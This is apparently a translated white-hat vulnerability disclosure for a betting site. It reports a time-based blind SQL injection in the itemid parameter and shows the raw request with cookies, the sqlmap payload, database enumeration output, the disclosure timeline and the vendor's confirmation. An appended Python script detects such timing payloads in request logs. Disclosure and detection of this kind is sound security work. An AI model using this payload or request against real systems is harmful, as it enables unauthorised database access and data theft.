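2015-11-26: Details reported to the vendor; awaiting vendor response
2015-11-27: Vendor confirmed; details disclosed to the vendor only
2015-12-07: Details disclosed to core white hats and relevant domain experts
2015-12-17: Details disclosed to regular white hats
2015-12-27: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public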
RT
http://touzhu.cn/ 投注网 (Touzhu betting site)
POST /ajaxact/ajax_ticket_info.php HTTP/1.1
Content-Length: 141
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://touzhu.cn
Cookie: PHPSESSID=0i0d8qv1pcg257g3lmtbsgs3f4; helpskaiguan=CaiSo; Hm_lvt_099264dbbc75fb6766d7d0a7155abbcc=1448331169,1448331342,1448331468,1448331677; Hm_lpvt_099264dbbc75fb6766d7d0a7155abbcc=1448331677; HMACCOUNT=3C51B8E09E24C184; box_wxts=on; bdshare_firstime=1448328867470; BAIDUID=59E436C689FE1279BA502F5E6F4883E0:FG=1
Host: touzhu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

itemid=*
The itemid parameter is vulnerable to injection.
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: itemid=' AND (SELECT * FROM (SELECT(SLEEP(5)))ROcc) AND 'Lbdo'='Lbdo
---
web application technology: PHP 5.4.41
back-end DBMS: MySQL 5
current user: '[email protected]'
current database: 'caiso'
current user is DBA: False
available databases [2]:
[*] caiso
[*] information_schema
There are too many tables; the enumeration did not finish...
Requesting a high rank.
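A defender-side check for the time-based blind injection reported above, as an added example that is not part of the original report: it scans request records for the affected endpoint and flags itemid values that carry a timing call, treating the attempt as confirmed when the response time matches the delay. The tab-separated record format, the numeric-itemid rule and the 4-second threshold are assumptions, and the sample records are constructed.

```python
import re
from urllib.parse import parse_qs

# Constructed sample records (assumed format): "<path>\t<POST body>\t<seconds>"
SAMPLE_LOG = """\
/ajaxact/ajax_ticket_info.php\titemid=10482\t0.08
/ajaxact/ajax_ticket_info.php\titemid=%27+AND+%28SELECT+*+FROM+%28SELECT%28SLEEP%285%29%29%29ROcc%29+AND+%27Lbdo%27%3D%27Lbdo\t5.11
/ajaxact/ajax_ticket_info.php\titemid=10483\t6.40
/ajaxact/ajax_ticket_info.php\titemid=1%27\t0.05
/ajaxact/ajax_other.php\titemid=1%27\t0.05
"""

# MySQL functions commonly used to introduce a measurable delay.
TIMING_CALL = re.compile(r"\b(sleep|benchmark)\s*\(", re.I)
# Assumption: a legitimate itemid is a short decimal identifier.
PLAIN_ID = re.compile(r"^\d{1,12}$")


def classify(body, seconds, slow=4.0):
    """Return a verdict for one POST body and its response time."""
    value = parse_qs(body, keep_blank_values=True).get("itemid", [""])[0]
    if PLAIN_ID.match(value):
        # Well-formed input: a slow reply is a performance issue, not an attack.
        return "ok" if seconds < slow else "slow-benign"
    if TIMING_CALL.search(value):
        # The delay actually happening means the payload reached the database.
        if seconds >= slow:
            return "timing-injection-confirmed"
        return "timing-injection-attempt"
    return "malformed-itemid"


def scan(log, path="/ajaxact/ajax_ticket_info.php"):
    """Return (verdict, body) for every non-ok request to the given path."""
    findings = []
    for line in log.splitlines():
        if not line.strip():
            continue
        req_path, body, secs = line.split("\t")
        if req_path != path:
            continue
        verdict = classify(body, float(secs))
        if verdict != "ok":
            findings.append((verdict, body))
    return findings


if __name__ == "__main__":
    for verdict, body in scan(SAMPLE_LOG):
        print(verdict, body[:60])
```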
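Severity: High
Vulnerability Rank: 15
Confirmation time: 2015-11-27 11:01
Thanks. Thank you for caring about our vulnerability. It has been handed over to our developer.
None yet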